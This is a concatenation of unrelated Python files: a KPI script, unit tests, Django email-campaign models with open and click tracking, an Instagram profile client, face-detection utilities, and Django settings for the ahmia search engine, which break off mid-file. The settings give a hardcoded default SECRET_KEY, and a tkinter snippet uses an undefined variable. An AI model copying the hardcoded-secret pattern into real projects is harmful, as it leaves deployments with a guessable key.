    df_od = get_absolute_and_relative_error_for_each_od(od_index)
    #filename_error = filename_base_route_error + str(od_index) + '.csv'
    #df_od = pd.read_csv(filename_error, sep = ',')
    convergent_senario_number = len(df_od)
    for column_name_temp in column_names_method:
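        # For each KPI column: RMSE = sqrt(mean of the squared absolute errors) and
        # MAPE = 100 * mean of the relative errors, averaged over the convergent
        # scenarios for this OD (see the loop body below).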
df_od['temp'] = df_od['absolute_' + column_name_temp].map(lambda x : x * x) sum_temp = sum(df_od['temp'].values.tolist()) df.loc[od_index, 'rmse_' + column_name_temp] = math.sqrt(sum_temp/convergent_senario_number) sum_temp_mape = sum(df_od['relative_' + column_name_temp].values.tolist()) df.loc[od_index, 'mape_' + column_name_temp] = 100 * sum_temp_mape/convergent_senario_number return df def get_key_performance_indicators_for_all_ods(): extra_term = 'rmse_mape.csv' column_names_method = ['whole_matching_probability', 'shared_distance', 'save_distance', 'traveling_distance'] prefixes = ['rmse_', 'mape_'] columns = [] for column_name in column_names_method: for prefix in prefixes: columns.append(prefix + column_name) df_result = pd.DataFrame(columns = columns) for od_index in range(300): df_result = get_key_performance_indicators_for_each_od(df_result, od_index) filename = filename_base_result + extra_term df_result.to_csv(filename, sep = ',', index = False) if __name__ == "__main__": get_key_performance_indicators_for_all_ods() import unittest from .delete import Delete from ..mocks import Models, InputOutput from ..column_types import String, Integer from ..input_requirements import Required, MaximumLength from ..authentication import Public, SecretBearer from ..di import StandardDependencies class DeleteTest(unittest.TestCase): def setUp(self): Models.reset() self.models = Models({ 'name': {'class': String, 'input_requirements': [Required]}, 'email': {'class': String, 'input_requirements': [Required, (MaximumLength, 15)]}, 'age': {'class': Integer}, }) self.models.add_search_response([{'id': 5, 'name': 'Conor', 'email': '', 'age': 10}]) self.di = StandardDependencies() def test_delete_flow(self): delete = Delete(self.di) delete.configure({ 'models': self.models, 'authentication': Public(), }) response = delete(InputOutput(body={'id': '5'})) self.assertEquals('success', response[0]['status']) self.assertEquals(200, response[1]) deleted = Models.deleted[0] self.assertEquals(5, deleted['id']) condition = Models.iterated[0]['wheres'][0] self.assertEquals('id', condition['column']) self.assertEquals(['5'], condition['values']) self.assertEquals('=', condition['operator']) def test_documentation(self): delete = Delete(self.di) delete.configure({ 'models': self.models, 'authentication': Public(), }) documentation = delete.documentation()[0] self.assertEquals(0, len(documentation.parameters)) self.assertEquals(2, len(documentation.responses)) self.assertEquals([200, 404], [response.status for response in documentation.responses]) success_response = documentation.responses[0] self.assertEquals( ['status', 'data', 'pagination', 'error', 'inputErrors'], [schema.name for schema in success_response.schema.children] ) CreativeWurks/emailerpro import json import re import uuid from typing import Optional from django.apps import apps from django.contrib.sites.shortcuts import get_current_site from django.db import models, transaction from django.db.models import Count, QuerySet from django.template import Context, Template from django.urls import reverse from django.utils import timezone from django.utils.crypto import get_random_string from django.utils.translation import gettext, gettext_lazy as _ from bs4 import BeautifulSoup from colossus.apps.lists.models import MailingList from colossus.apps.subscribers.constants import ActivityTypes from colossus.apps.templates.models import EmailTemplate from colossus.apps.templates.utils import get_template_blocks from .constants import CampaignStatus, 
CampaignTypes from .tasks import send_campaign_task, update_rates_after_campaign_deletion class Campaign(models.Model): uuid = models.UUIDField(default=uuid.uuid4, unique=True, editable=False) name = models.CharField(_('name'), max_length=100) campaign_type = models.PositiveSmallIntegerField( _('type'), choices=CampaignTypes.CHOICES, default=CampaignTypes.REGULAR ) mailing_list = models.ForeignKey( MailingList, on_delete=models.CASCADE, verbose_name=_('mailing list'), related_name='campaigns', null=True, blank=True ) tag = models.ForeignKey( 'subscribers.Tag', on_delete=models.SET_NULL, verbose_name=_('tag'), related_name='campaigns', null=True, blank=True ) status = models.PositiveSmallIntegerField( _('status'), choices=CampaignStatus.CHOICES, default=CampaignStatus.DRAFT, db_index=True ) send_date = models.DateTimeField(_('send date'), null=True, blank=True, db_index=True) create_date = models.DateTimeField(_('create date'), auto_now_add=True) update_date = models.DateTimeField(_('update date'), default=timezone.now) recipients_count = models.PositiveIntegerField(default=0) track_opens = models.BooleanField(_('track opens'), default=True) track_clicks = models.BooleanField(_('track clicks'), default=True) unique_opens_count = models.PositiveIntegerField(_('unique opens'), default=0, editable=False) total_opens_count = models.PositiveIntegerField(_('total opens'), default=0, editable=False) unique_clicks_count = models.PositiveIntegerField(_('unique clicks'), default=0, editable=False) total_clicks_count = models.PositiveIntegerField(_('total clicks'), default=0, editable=False) open_rate = models.FloatField(_('opens'), default=0.0, editable=False) click_rate = models.FloatField(_('clicks'), default=0.0, editable=False) __cached_email = None class Meta: verbose_name = _('campaign') verbose_name_plural = _('campaigns') db_table = 'colossus_campaigns' def __str__(self): return self.name def get_absolute_url(self) -> str: if self.can_edit: return reverse('campaigns:campaign_edit', kwargs={'pk': self.pk}) elif self.is_scheduled: return reverse('campaigns:campaign_scheduled', kwargs={'pk': self.pk}) return reverse('campaigns:campaign_detail', kwargs={'pk': self.pk}) def delete(self, using=None, keep_parents=False): super().delete(using, keep_parents) update_rates_after_campaign_deletion.delay(self.mailing_list_id) @property def is_scheduled(self) -> bool: return self.status == CampaignStatus.SCHEDULED @property def can_edit(self) -> bool: return self.status == CampaignStatus.DRAFT @property def can_send(self) -> bool: for email in self.emails.all(): if not email.can_send: return False else: return True @property def email(self) -> Optional['Email']: if not self.__cached_email and self.campaign_type == CampaignTypes.REGULAR: try: self.__cached_email, created = Email.objects.get_or_create(campaign=self) except Email.MultipleObjectsReturned: self.__cached_email = self.emails.order_by('id').first() return self.__cached_email def get_recipients(self): queryset = self.mailing_list.get_active_subscribers() if self.tag is not None: queryset = queryset.filter(tags=self.tag) return queryset def send(self): with transaction.atomic(): self.recipients_count = self.get_recipients().count() self.send_date = timezone.now() self.status = CampaignStatus.QUEUED for email in self.emails.select_related('template').all(): if email.template is not None: email.template.last_used_date = timezone.now() email.template.last_used_campaign_id = self.pk email.template.save() self.save() send_campaign_task.delay(self.pk) 
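    # send(): within a single transaction, snapshot the recipient count, stamp the send
    # date, mark the campaign as QUEUED and record last-used info on each email template;
    # actual delivery is then handed off to send_campaign_task.delay(), i.e. performed
    # asynchronously by the task queue.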
@transaction.atomic def replicate(self): copy = gettext(' (copy)') slice_at = 100 - len(copy) name = '%s%s' % (self.name[:slice_at], copy) replicated_campaign = Campaign.objects.create( name=name, campaign_type=self.campaign_type, mailing_list=self.mailing_list, status=CampaignStatus.DRAFT, ) replicated_emails = list() for email in self.emails.all(): replicated_email = Email( campaign=replicated_campaign, template=email.template, template_content=email.template_content, from_email=email.from_email, from_name=email.from_name, subject=email.subject, preview=email.preview, content=email.content, content_html=email.content_html, content_text=email.content_text ) replicated_emails.append(replicated_email) Email.objects.bulk_create(replicated_emails) return replicated_campaign def update_clicks_count_and_rate(self) -> tuple: Activity = apps.get_model('subscribers', 'Activity') qs = Activity.objects.filter(email__campaign=self, activity_type=ActivityTypes.CLICKED) \ .values('subscriber_id') \ .order_by('subscriber_id') \ .aggregate(unique_count=Count('subscriber_id', distinct=True), total_count=Count('subscriber_id')) self.unique_clicks_count = qs['unique_count'] self.total_clicks_count = qs['total_count'] try: self.click_rate = self.unique_clicks_count / self.recipients_count except ZeroDivisionError: self.click_rate = 0.0 self.save(update_fields=['unique_clicks_count', 'total_clicks_count', 'click_rate']) return (self.unique_clicks_count, self.total_clicks_count, self.click_rate) def update_opens_count_and_rate(self) -> tuple: Activity = apps.get_model('subscribers', 'Activity') qs = Activity.objects.filter(email__campaign=self, activity_type=ActivityTypes.OPENED) \ .values('subscriber_id') \ .order_by('subscriber_id') \ .aggregate(unique_count=Count('subscriber_id', distinct=True), total_count=Count('subscriber_id')) self.unique_opens_count = qs['unique_count'] self.total_opens_count = qs['total_count'] try: self.open_rate = self.unique_opens_count / self.recipients_count except ZeroDivisionError: self.open_rate = 0.0 self.save(update_fields=['unique_opens_count', 'total_opens_count', 'open_rate']) return (self.unique_opens_count, self.total_opens_count, self.open_rate) def get_links(self) -> QuerySet: """ A method to list campaign's links :return: All links associated with the campaign, ordered by the total number of clicks """ links = Link.objects.filter(email__campaign=self).order_by('-total_clicks_count') return links class Email(models.Model): uuid = models.UUIDField(default=uuid.uuid4, unique=True, editable=False) campaign = models.ForeignKey(Campaign, on_delete=models.CASCADE, verbose_name=_('campaign'), related_name='emails') template = models.ForeignKey( EmailTemplate, on_delete=models.SET_NULL, verbose_name=_('email template'), related_name='emails', null=True, blank=True ) template_content = models.TextField(_('email template content'), blank=True) from_email = models.EmailField(_('email address')) from_name = models.CharField(_('name'), max_length=100, blank=True) subject = models.CharField(_('subject'), max_length=150) preview = models.CharField(_('preview'), max_length=150, blank=True) content = models.TextField(_('content'), blank=True) content_html = models.TextField(_('content HTML'), blank=True) content_text = models.TextField(_('content plain text'), blank=True) unique_opens_count = models.PositiveIntegerField(_('unique opens'), default=0, editable=False) total_opens_count = models.PositiveIntegerField(_('total opens'), default=0, editable=False) unique_clicks_count = 
models.PositiveIntegerField(_('unique clicks'), default=0, editable=False) total_clicks_count = models.PositiveIntegerField(_('total clicks'), default=0, editable=False) __blocks = None __base_template = None __child_template_string = None BASE_TEMPLATE_VAR = 'base_template' class Meta: verbose_name = _('email') verbose_name_plural = _('emails') db_table = 'colossus_emails' def __str__(self): return self.subject @property def base_template(self) -> Template: if self.__base_template is None: self.__base_template = Template(self.template_content) return self.__base_template @property def child_template_string(self) -> str: if self.__child_template_string is None: self.__child_template_string = self.build_child_template_string() return self.__child_template_string def set_template_content(self): if self.template is None: self.template_content = EmailTemplate.objects.default_content() else: self.template_content = self.template.content def get_from(self) -> str: if self.from_name: return '%s <%s>' % (self.from_name, self.from_email) return self.from_email def get_base_template(self) -> Template: """ Retuns a Django template using `template_content` field. Fallback to default basic template defined by EmailTemplate. """ if self.template_content: template = Template(self.template_content) else: template_string = EmailTemplate.objects.default_content() template = Template(template_string) return template def set_blocks(self, blocks=None): if blocks is None: old_blocks = self.get_blocks() blocks = dict() template = self.get_base_template() template_blocks = get_template_blocks(template) for block_name, block_content in template_blocks.items(): inherited_content = block_content if block_name in old_blocks.keys(): old_block_content = old_blocks.get(block_name, '').strip() if old_block_content: inherited_content = old_blocks[block_name] blocks[block_name] = inherited_content self.content = json.dumps(blocks) self.__blocks = blocks def load_blocks(self) -> dict: try: blocks = json.loads(self.content) except (TypeError, json.JSONDecodeError): blocks = {'content': ''} return blocks def get_blocks(self) -> dict: if self.__blocks is None: self.__blocks = self.load_blocks() return self.__blocks def checklist(self) -> dict: _checklist = { 'recipients': False, 'from': False, 'subject': False, 'content': False, 'unsub': False } if self.campaign.mailing_list is not None and self.campaign.mailing_list.get_active_subscribers().exists(): _checklist['recipients'] = True if self.from_email: _checklist['from'] = True if self.subject: _checklist['subject'] = True if self.content: _checklist['content'] = True # Generate a random string and pass it to the render function # as if it was the unsubscribe url. If we can find this token in the # rendered template, we can say the unsubscribe url will be rendered. # Not 100% guranteed, as the end user can still bypass it (e.g. # changing visibility with html). token = get_random_string(50) rendered_template = self.render({'unsub': token}) _checklist['unsub'] = token in rendered_template return _checklist @property def can_send(self) -> bool: checklist = self.checklist() for value in checklist.values(): if not value: return False else: return True def build_child_template_string(self) -> str: """ Build a valid Django template string with `extends` block tag on top and representation of each content blocks, constructed from the JSON object. 
""" virtual_template = ['{%% extends %s %%}' % self.BASE_TEMPLATE_VAR, ] blocks = self.get_blocks() for block_key, block_content in blocks.items(): if block_content: virtual_template.append('{%% block %s %%}\n%s\n{%% endblock %%}' % (block_key, block_content)) return '\n\n'.join(virtual_template) def _render(self, template_string, context_dict) -> str: template = Template(template_string) context = Context(context_dict) return template.render(context) def render(self, context_dict) -> str: context_dict.update({self.BASE_TEMPLATE_VAR: self.base_template}) return self._render(self.child_template_string, context_dict) def _enable_click_tracking(self, html, index=0): urls = re.findall(r'(?i)(href=["\']?)(https?://[^"\' >]+)', html) for data in urls: href = data[0] url = data[1] link, created = Link.objects.get_or_create(email=self, url=url, index=index) current_site = get_current_site(request=None) protocol = 'http' domain = current_site.domain # We cannot use django.urls.reverse here because part of the kwargs # will be processed during the sending campaign (including the `subscriber_uuid`) # With the `{{ uuid }}` we are introducing an extra django template variable # which will be later used to replace with the subscriber's uuid. track_url = '%s://%s/track/click/%s/{{uuid}}/' % (protocol, domain, link.uuid) html = html.replace('%s%s' % (href, url), '%s%s' % (href, track_url), 1) index += 1 return html, index def enable_click_tracking(self): self.template_content, index = self._enable_click_tracking(self.template_content) blocks = self.get_blocks() for key, html in blocks.items(): blocks[key], index = self._enable_click_tracking(html, index) self.set_blocks(blocks) def enable_open_tracking(self): current_site = get_current_site(request=None) protocol = 'http' domain = current_site.domain track_url = '%s://%s/track/open/%s/{{uuid}}/' % (protocol, domain, self.uuid) soup = BeautifulSoup(self.template_content, 'html.parser') img_tag = soup.new_tag('img', src=track_url, height='1', width='1') body = soup.find('body') if body is not None: body.append(img_tag) self.template_content = str(soup) else: self.template_content = '%s %s' % (self.template_content, img_tag) def update_clicks_count(self) -> tuple: qs = self.activities.filter(activity_type=ActivityTypes.CLICKED) \ .values('subscriber_id') \ .order_by('subscriber_id') \ .aggregate(unique_count=Count('subscriber_id', distinct=True), total_count=Count('subscriber_id')) self.unique_clicks_count = qs['unique_count'] self.total_clicks_count = qs['total_count'] self.save(update_fields=['unique_clicks_count', 'total_clicks_count']) return (self.unique_clicks_count, self.total_clicks_count) def update_opens_count(self) -> tuple: qs = self.activities.filter(activity_type=ActivityTypes.OPENED) \ .values('subscriber_id') \ .order_by('subscriber_id') \ .aggregate(unique_count=Count('subscriber_id', distinct=True), total_count=Count('subscriber_id')) self.unique_opens_count = qs['unique_count'] self.total_opens_count = qs['total_count'] self.save(update_fields=['unique_opens_count', 'total_opens_count']) return (self.unique_opens_count, self.total_opens_count) class Link(models.Model): uuid = models.UUIDField(default=uuid.uuid4, unique=True, editable=False) email = models.ForeignKey( Email, on_delete=models.SET_NULL, null=True, related_name='links', verbose_name=_('email') ) url = models.URLField(_('URL'), max_length=2048) unique_clicks_count = models.PositiveIntegerField(_('unique clicks count'), default=0, editable=False) total_clicks_count = 
models.PositiveIntegerField(_('total clicks count'), default=0, editable=False) index = models.PositiveSmallIntegerField(_('index'), default=0) class Meta: verbose_name = _('link') verbose_name_plural = _('links') db_table = 'colossus_links' def __str__(self) -> str: return self.url def delete(self, using=None, keep_parents=False): """ Prevent links from being deleted after they are sent. Otherwise it may cause broken links in the emails. """ if self.can_delete: return super().delete(using, keep_parents) @property def can_delete(self) -> bool: """ Determines if the link can be deleted or not. First check if the email field is null. It should never be null unless the campaign was deleted by the user and all relationship cascaded. Except for the link as it should set to null. In that case, assume that the email/campaign was already sent, as the links are created during the sending process. The other case is when email is not null, so we can check the status of the campaign. :return: True if it's safe to delete the link, False otherwise. """ if self.email is None or self.email.campaign.status != CampaignStatus.DRAFT: return False return True @property def short_uuid(self) -> str: """ A short identifier to be used in the links reports. :return: The first eight characters of the link UUID. """ return str(self.uuid)[:8] def update_clicks_count(self) -> tuple: """ Query the database and update the link click statistics based on subscribers activities. :return: A tuple containing two values: unique clicks and total clicks """ qs = self.activities.values('subscriber_id').order_by('subscriber_id').aggregate( unique_count=Count('subscriber_id', distinct=True), total_count=Count('subscriber_id') ) self.unique_clicks_count = qs['unique_count'] self.total_clicks_count = qs['total_count'] self.save(update_fields=['unique_clicks_count', 'total_clicks_count']) return (self.unique_clicks_count, self.total_clicks_count) from ea_interop_service_source.b_code.i_dual_objects.stereotypes.i_stereotype import IStereotype class INullStereotype( IStereotype): def __init__( self): IStereotype.__init__( self) pass FullAxis_GUI/config/test2.py from tkinter import * from tkinter import ttk root = Tk() note = ttk.Notebook(root) variables = {} for name, colour, shape in Applist: variables[name + "_n"] = name tab = Frame(note) d=note.add(tab, text = "ddd") #Button(root, text='+', command=add).grid(row=1, column=1) note.grid(row=1) root.mainloop()# from .coco import COCO # from .voc import VOC # from .ade20k import ADE20K # from .cityscapes import CityScapes from .voc1 import VOC 0 import pytest from django.contrib.auth import get_user_model from mixer.backend.django import mixer from person_app.models import Person, Birth from core.models import ( DateTime, GivName, SurName, SURNAME_DICT, ) pytestmark = pytest.mark.django_db class TestBirth: def test_birth(self): instance = mixer.blend(Birth) assert instance assert instance.pk def test_person(self): person = mixer.blend(Person) birth = mixer.blend(Birth) birth.person = person.pk birth.save() assert birth.person == person person = mixer.blend(Person) birth.person = person birth.save() assert birth.person == person def test_givname_getter(self): birth = mixer.blend(Birth) assert not birth.givname birth._givname = GivName.objects.create(givname='abc') birth.save() assert birth.givname == 'abc' def test_givname_setter(self): birth = mixer.blend(Birth) assert birth._givname is None # Argument is str birth.givname = 'Yyyий' birth.save() assert birth._givname.givname == 'Yyyий' 
birth.givname = None birth.save() assert birth._givname is None # Argument is GivName birth.givname = GivName.objects.create(givname='Yyyий') birth.save() assert birth._givname.givname == 'Yyyий' birth.givname = None birth.save() assert birth._givname is None def test_surname_getter(self): birth = mixer.blend(Birth) assert birth.surname == '' # Male birth.gender = 'M' birth._surname = SurName.objects.create( _surname_male='Yyyий', _surname_female='Xxxая', ) birth.save() assert birth.surname == 'Yyyий' # Female birth.gender = 'F' birth.save() assert birth.surname == 'Xxxая' def test_surname_setter(self): birth = mixer.blend(Birth) assert birth._surname is None # Male birth.gender = 'M' # Argument is str birth.surname = 'Yyyий' birth.save() assert birth._surname._surname_male == 'Yyyий' birth.surname = None birth.save() assert birth._surname is None # Argument is SurName birth.surname = SurName.objects.create(_surname_male='Yyyий') birth.save() assert birth._surname._surname_male == 'Yyyий' birth.surname = None birth.save() assert birth._surname is None # Female birth.gender = 'F' # Argument is str birth.surname = 'Xxxая' birth.save() assert birth._surname._surname_female == 'Xxxая' birth.surname = None birth.save() assert birth._surname is None # Argument is SurName birth.surname = SurName.objects.create(_surname_female='Xxxая') birth.save() assert birth._surname._surname_female == 'Xxxая' birth.surname = None birth.save() assert birth._surname is None dt_data = { 'year': 2000, 'month': 6, 'day': 15, 'hour': 12, 'minute': 30, } def test_datetime_getter(self): birth = mixer.blend(Birth) assert not birth._datetime obj = mixer.blend(DateTime) for key in self.dt_data: value = self.dt_data.get(key) setattr(obj, key, value) obj.save() birth._datetime = obj assert birth.datetime == self.dt_data def test_datetime_setter(self): birth = mixer.blend(Birth) assert birth._datetime is None birth.datetime = self.dt_data birth.save() for key in self.dt_data: value = self.dt_data.get(key) assert getattr(birth._datetime, key, value) == value birth.datetime = None birth.save() assert birth._datetime is None def test_link(self): data = { 'givname': [GivName, 'Иван', '_givname'], 'surname': [SurName, 'Иванов', '_surname'], 'datetime': [DateTime, self.dt_data, '_datetime'], #'datetime': [DateTime, {}, '_datetime'], } for key in data: obj = data.get(key)[0] value = data.get(key)[1] _ = data.get(key)[2] birth = mixer.blend(Birth) bpk1 = birth.pk setattr(birth, key, value) birth.save() assert obj.objects.all().count() == 1 assert obj.objects.filter(link=1).count() == 1 birth = mixer.blend(Birth) bpk2 = birth.pk setattr(birth, key, value) birth.save() assert obj.objects.all().count() == 1 assert obj.objects.filter(link=2).count() == 1 birth = Birth.objects.get(pk=bpk1) setattr(birth, key, None) birth.save() assert obj.objects.all().count() == 1 assert obj.objects.filter(link=1).count() == 1 Birth.objects.get(pk=bpk2).delete() assert obj.objects.all().count() == 0 if hasattr(obj, 'note'): instance = mixer.blend(obj) instance.note = 'Hello' instance.save() birth = Birth.objects.get(pk=bpk1) setattr(birth, key, value) birth.save() assert obj.objects.get(link=1) birth = mixer.blend(Birth) bpk2 = birth.pk birth = Birth.objects.get(pk=bpk2) setattr(birth, key, value) birth.save() assert obj.objects.get(link=2) Birth.objects.get(pk=bpk2).delete() assert obj.objects.get(link=1) birth = Birth.objects.get(pk=bpk1) setattr(birth, key, None) birth.save() assert obj.objects.get(link=0) assert obj.objects.all().count() == 1 o = 
obj.objects.get(link=0) o.note = '' o.save() obj.objects.all().delete() def test_likes(self): user1 = mixer.blend(get_user_model()) user2 = mixer.blend(get_user_model()) obj = Birth.objects.create( person=mixer.blend(Person), ) obj._likes.add(user1) assert obj.likes == 1 obj._likes.add(user2) assert obj.likes == 2 obj._likes.remove(user1) assert obj.likes == 1 obj._likes.remove(user2) assert obj.likes == 0 def test_save(self): birth1 = Birth.objects.create( givname="Иван", surname="Иванов" ) assert Person.objects.all().count() == 1 person = Person.objects.get(pk=birth1.pk) birth2 = Birth.objects.create( person=person, givname="Иван", surname="Иванов" ) assert Person.objects.all().count() == 1 def test_delete(self): birth = Birth.objects.create() assert birth._person is not None person = mixer.blend(Person) assert Person.objects.all().count() == 2 birth._person = person birth.save() assert Person.objects.all().count() == 2 Birth.objects.create() assert Person.objects.all().count() == 3 mapillary_tools/commands/authenticate.py100-1000 import argparse import inspect from ..authenticate import authenticate class Command: name = "authenticate" help = "authenticate Mapillary users" def add_basic_arguments(self, parser: argparse.ArgumentParser): parser.add_argument( "--user_name", help="Mapillary user name", default=None, required=False ) parser.add_argument( "--user_email", help="User email, used to create Mapillary account", default=None, required=False, ) parser.add_argument( "--user_password", help="Password associated with the Mapillary user account", default=None, required=False, ) parser.add_argument( "--jwt", help="Mapillary user access token", default=None, required=False ) def run(self, vars_args: dict): authenticate( **( { k: v for k, v in vars_args.items() if k in inspect.getfullargspec(authenticate).args } ) ) Veristack/veristack-client-python0 """Package setup.""" from setuptools import find_packages from setuptools import setup with open('requirements.txt') as f: REQUIRED = f.read().splitlines() REQUIRED = [r for r in REQUIRED if not r.startswith('git')] setup( name='veristack-client', version='0.1', install_requires=REQUIRED, description='A client for interfacing to Veristack', author='', author_email='', url='https://veristack.com/', platforms='OS Independent', packages=find_packages(), include_package_data=True, classifiers=[ 'Development Status :: 3 - Alpha', 'Environment :: Plugins', 'Intended Audience :: Developers', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Topic :: Software Development :: Libraries' ] ) import requests import json base_url = 'https://www.instagram.com/{}/?__a=1' class Client: def get_common_profile(self, username): """ Get Instagram common profile by username Arguments: - username: ``str`` Return Profile that including full_name, profile_pic, follower and following """ if not username or username.isspace(): raise Exception('username should not be none or empty') return self._get_profile( self._send_request(username) ) @staticmethod def _send_request(username): return requests.get(base_url.format(username)) @staticmethod def _get_profile(response): if response.status_code == 404: raise Exception('profile not found') response.raise_for_status() profile_response = json.loads(response.content, encoding='utf-8') return Profile( profile_response['graphql']['user']['full_name'], profile_response['graphql']['user']['profile_pic_url_hd'], profile_response['graphql']['user']['edge_followed_by']['count'], 
profile_response['graphql']['user']['edge_follow']['count'] ) class Profile: def __init__(self, full_name, profile_pic, follower, following): self.full_name = full_name self.profile_pic = profile_pic self.follower = follower self.following = following tkianai/Facenet.Inferencedetector/utils.py import numpy as np import torch def decode(loc, priors, variances): """Decode locations from predictions using priors to undo the encoding we did for offset regression at train time. Args: loc (tensor): location predictions for loc layers, Shape: [num_priors,4] priors (tensor): Prior boxes in center-offset form. Shape: [num_priors,4]. variances: (list[float]) Variances of priorboxes Return: decoded bounding box predictions """ boxes = torch.cat(( priors[:, :2] + loc[:, :2] * variances[0] * priors[:, 2:], priors[:, 2:] * torch.exp(loc[:, 2:] * variances[1])), 1) boxes[:, :2] -= boxes[:, 2:] / 2 boxes[:, 2:] += boxes[:, :2] return boxes def decode_landm(pre, priors, variances): """Decode landm from predictions using priors to undo the encoding we did for offset regression at train time. Args: pre (tensor): landm predictions for loc layers, Shape: [num_priors,10] priors (tensor): Prior boxes in center-offset form. Shape: [num_priors,4]. variances: (list[float]) Variances of priorboxes Return: decoded landm predictions """ landms = torch.cat((priors[:, :2] + pre[:, :2] * variances[0] * priors[:, 2:], priors[:, :2] + pre[:, 2:4] * variances[0] * priors[:, 2:], priors[:, :2] + pre[:, 4:6] * variances[0] * priors[:, 2:], priors[:, :2] + pre[:, 6:8] * variances[0] * priors[:, 2:], priors[:, :2] + pre[:, 8:10] * variances[0] * priors[:, 2:], ), dim=1) return landms def py_cpu_nms(dets, thresh): """Pure Python NMS baseline.""" x1 = dets[:, 0] y1 = dets[:, 1] x2 = dets[:, 2] y2 = dets[:, 3] scores = dets[:, 4] areas = (x2 - x1 + 1) * (y2 - y1 + 1) order = scores.argsort()[::-1] keep = [] while order.size > 0: i = order[0] keep.append(i) xx1 = np.maximum(x1[i], x1[order[1:]]) yy1 = np.maximum(y1[i], y1[order[1:]]) xx2 = np.minimum(x2[i], x2[order[1:]]) yy2 = np.minimum(y2[i], y2[order[1:]]) w = np.maximum(0.0, xx2 - xx1 + 1) h = np.maximum(0.0, yy2 - yy1 + 1) inter = w * h ovr = inter / (areas[i] + areas[order[1:]] - inter) inds = np.where(ovr <= thresh)[0] order = order[inds + 1] return keep """Django project settings for ahmia.""" import os from os.path import dirname, join, abspath from decouple import config, Csv # Set the PROJECT_HOME variable. # This will be used to prepend to all file/directory paths. 
PROJECT_HOME = abspath(join(dirname(__file__), '..', '..')) # Build paths inside the project like this: path("ahmia") def ROOT_PATH(*x): return join(PROJECT_HOME, *x) ALLOWED_HOSTS = config('ALLOWED_HOSTS', cast=Csv(), default='localhost, 127.0.0.1') # ELASTICSEARCH STUFF ELASTICSEARCH_TLS_FPRINT = config( 'ELASTICSEARCH_TLS_FPRINT', default="8C:DC:67:EA:C3:B3:97:94:92:30:81:35:8C:C6:D9:2A:E2:E6:8E:3E") # 'https://ahmia.fi/esconnection/' ELASTICSEARCH_SERVERS = config('ELASTICSEARCH_SERVERS', cast=Csv(), default='http://localhost:9200,') # BOTH-INDEX exists in case we want to look into both to onion and i2p addresses ~ currently unused # ELASTICSEARCH_BOTH_INDEX = config('ELASTICSEARCH_BOTH_INDEX', default='latest-crawl') ELASTICSEARCH_TOR_INDEX = config('ELASTICSEARCH_TOR_INDEX', default='latest-tor') ELASTICSEARCH_I2P_INDEX = config('ELASTICSEARCH_I2P_INDEX', default='latest-i2p') # common type for bot indices # todo change to _doc or rm when upgrade to ES 7.x ELASTICSEARCH_TYPE = config('ELASTICSEARCH_TYPE', default='doc') ELASTICSEARCH_TIMEOUT = config('ELASTICSEARCH_TIMEOUT', cast=int, default=60) # Email settings EMAIL_USE_TLS = config('EMAIL_USE_TLS', cast=bool, default=True) EMAIL_HOST = config('EMAIL_HOST', default='smtp.gmail.com') EMAIL_PORT = config('EMAIL_PORT', cast=int, default=587) EMAIL_HOST_USER = config('EMAIL_HOST_USER', default="") EMAIL_HOST_PASSWORD = config('EMAIL_HOST_PASSWORD', default="") DEFAULT_FROM_EMAIL = config('DEFAULT_FROM_EMAIL', default=EMAIL_HOST_USER) RECIPIENT_LIST = config('RECIPIENT_LIST', cast=Csv(), default=DEFAULT_FROM_EMAIL) # Local time zone for this installation. Choices can be found here: # http://en.wikipedia.org/wiki/List_of_tz_zones_by_name # although not all choices may be available on all operating systems. # On Unix systems, a value of None will cause Django to use the same # timezone as the operating system. # If running in a Windows environment this must be set to the same as your # system time zone. TIME_ZONE = 'America/Chicago' # todo Isn't TIME_ZONE theoretically useless without USE_TZ=True? # Language code for this installation. All choices can be found here: # http://www.i18nguy.com/unicode/language-identifiers.html LANGUAGE_CODE = 'en-us' SITE_ID = 1 # If you set this to False, Django will make some optimizations so as not # to load the internationalization machinery. USE_I18N = True # If you set this to False, Django will not format dates, numbers and # calendars according to the current locale USE_L10N = True # STATIC # ------------------------------------------------------------------------------ # https://docs.djangoproject.com/en/dev/ref/settings/#static-url STATIC_URL = '/static/' # Absolute path to the directory where collectstatic will collect static files for deployment. # https://docs.djangoproject.com/en/dev/ref/settings/#static-root STATIC_ROOT = ROOT_PATH('staticfiles/') # Additional locations the staticfiles app will traverse if the FileSystemFinder finder is enabled # https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-STATICFILES_DIRS # STATICFILES_DIRS = [ # ROOT_PATH('ahmia/static/'), # ROOT_PATH('search/static/'), # ROOT_PATH('stats/static/') # ] # List of finder classes that know how to find static files in various locations. 
# https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders STATICFILES_FINDERS = [ 'django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder', ] # Make this unique, and don't share it with anybody. SECRET_KEY = config('SECRET_KEY', default='%*ertqgmh3(t_d=i&ojuc!02wnech_nq#1*s7dbv3h=&ruf7*b') MIDDLEWARE_CLASSES = ( 'django.middleware.common.CommonMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', ) ROOT_URLCONF = 'ahmia.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.contrib.auth.context_processors.auth', 'django.template.context_processors.request', 'django.contrib.messages.context_processors.messages', ], # loads custom template tags 'libraries': { 'ahmia_tags': 'ahmia.template_tags', } } }, ] INSTALLED_APPS = ( 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sites', 'django.contrib.admin', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'ahmia', 'search', 'stats' ) # https://docs.djangoproject.com/en/1.11/ref/contrib/messages/#configuring-the-message-engine MESSAGE_STORAGE = 'django.contrib.messages.storage.session.SessionStorage' # *** LOGGING *** # # Log everything to the logs directory at the top LOGFILE_ROOT = ROOT_PATH('logs') if not os.path.exists(LOGFILE_ROOT): print("Creating logs empty folder %s" % LOGFILE_ROOT) os.mkdir(LOGFILE_ROOT) # Disable automatic default configuration process to apply our own settings LOGGING_CONFIG = None # Logging LOG_LEVEL = config('LOG_LEVEL', default='INFO') # Debug, Info, Warning, Error, Critical # Common settings ~ This dict is being updated inside dev.py / prod.py LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'verbose': { 'format': "[%(asctime)s] %(levelname)s 